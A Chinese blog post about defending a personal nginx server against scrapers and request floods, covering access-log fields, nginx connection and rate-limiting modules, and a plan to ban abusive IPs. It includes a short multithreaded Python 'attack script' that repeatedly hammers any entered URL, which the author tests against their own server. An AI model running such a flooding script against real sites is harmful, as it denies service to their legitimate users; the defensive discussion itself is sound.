Nginx反爬虫

最新推荐文章于 2022-12-03 16:40:48 发布

言之。

最新推荐文章于 2022-12-03 16:40:48 发布

阅读量1.4w

点赞数

分类专栏： nginx 文章标签： nginx python

本文链接：https://blog.csdn.net/qq_44810930/article/details/113586620

版权

nginx 专栏收录该内容

1 篇文章 2 订阅

订阅专栏

Nginx反爬

我使用了python中的requests库爬取自己网址的图片
通过while True 循环爬取导致正常客户端无法访问
在nginx的access.log中看到以下记录

117.170.202.207 - - [03/Feb/2021:10:35:06 +0800] "GET /pics/05.jpg HTTP/1.1" 200 326446 "-" "python-requests/2.24.0" "-"

而一个正常的访问应该是

117.170.202.207 - - [03/Feb/2021:10:32:46 +0800] "GET /img/9.ico HTTP/1.1" 206 1 "http://www.guixueliang.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x6       4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 Edg/88.0.705.56" "-"

我使用的log的format格式为

log_format  main  '$remote_addr - $remote_user [$time_local] "$request" '
                        '$status $body_bytes_sent "$http_referer" '
                        '"$http_user_agent" "$http_x_forwarded_for"';

各个字段的含义

$remote_addr 　　　　　　记录访问网站的客户端地址；
$remote_user 　　　　　　远程客户端用户名称；
$time_local 　　　　　　记录访问时间与时区；
$request 　　　　　　　　用户的http请求起始行信息；
$status 　　　　　　　　http状态码，记录请求返回的状态，例如200、404、301等；
$body_bytes_sent 　　服务器发给客户端的响应body字节数；
$http_referer 　　　　记录此次请求是从哪个链接访问呢过来的，可以根据referer进行防盗链设置；
$http_user_agent 　　记录客户端访问信息，例如：浏览器、手机客户端等；
$http_x_forwarded_for 　　当前端有代理服务器时，设置web节点记录客户端地址的配置，此参数生效的前提是代理服务器上也进行了相关的x_forwarded_for设置；

即在末尾看到的 python-requests/2.24.0 即为python的UA
但通过简单地禁止该UA是无效的，因为爬虫可以通过headers伪装

Nginx抵御DDOS

Nginx抵御爬虫

在nginx中屏蔽python-requests的UA后, 如果爬虫没有设置headers, 返回如下
403

我的想法是写一个脚本:

监控access.log, 如果同一个IP的访问过多，直接将其加入nginx黑名单

nginx内置机制防御

nginx中文文档

https://www.nginx.cn/doc/index.html
http://tengine.taobao.org/nginx_docs/cn/docs/

nginx屏蔽IP

https://www.nginx.cn/2487.html

首先我使用nginx自带的防御机制

1. 限定连接数
ngx_http_limit_conn_module 模块
http://tengine.taobao.org/nginx_docs/cn/docs/http/ngx_http_limit_conn_module.html

2. 限制请求处理的频率
ngx_http_limit_req_module 模块
http://tengine.taobao.org/nginx_docs/cn/docs/http/ngx_http_limit_req_module.html

python攻击脚本

import requests
import threading
headers = {"User-Agent":"...省略"}

url = input("请输入要攻击的ip或者网址(带http/https): ")

strength = int(input("请输入攻击强度[2~16]: "))
def run():
    n = 0
    while True:
        try:
            result = requests.get(url, headers=headers).content
            with open(str(n)+".jpg", "wb") as f:
                f.write(result)
        except Exception:
            pass
        n += 1
        print(n)
print("攻击中...")
for _ in range(strength):
    threading.Thread(target=run).start()

我开启16个线程同时访问我的服务器上的一张照片
战果如下
在这里插入图片描述

在一瞬间下载了数百张jpg格式的文件, 但只有215kb的文件才是真正的图片, 其中1kb的内容如下

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/1.12.2</center>
</body>
</html>
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!--用于禁用MSIE和Chrome友好错误页的填充 -->

小结关于nignx的两个防御模块 limit_conn / limit_req

虽然这两个模块确实帮我抵御住了一些攻击

攻击脚本3秒钟访问次数为247, 有效照片仅为3张

关键是我的是学生机, 带宽只有1M, 即下载速度为1024/8=128KB
仍然占满我的带宽
正常客户端仍然无法正常访问

看来还得使用我最初的想法: 封IP

言之。

关注

0
点赞
踩
3

收藏

觉得还不错? 一键收藏
2
评论
Nginx反爬虫

Nginx反爬我使用了python中的requests库爬取自己网址的图片通过while True 循环爬取导致正常客户端无法访问在nginx的access.log中看到以下记录117.170.202.207 - - [03/Feb/2021:10:35:06 +0800] "GET /pics/05.jpg HTTP/1.1" 200 326446 "-" "python-requests/2.24.0" "-"而一个正常的访问应该是117.170.202.207 - - [03/Feb/2
复制链接

扫一扫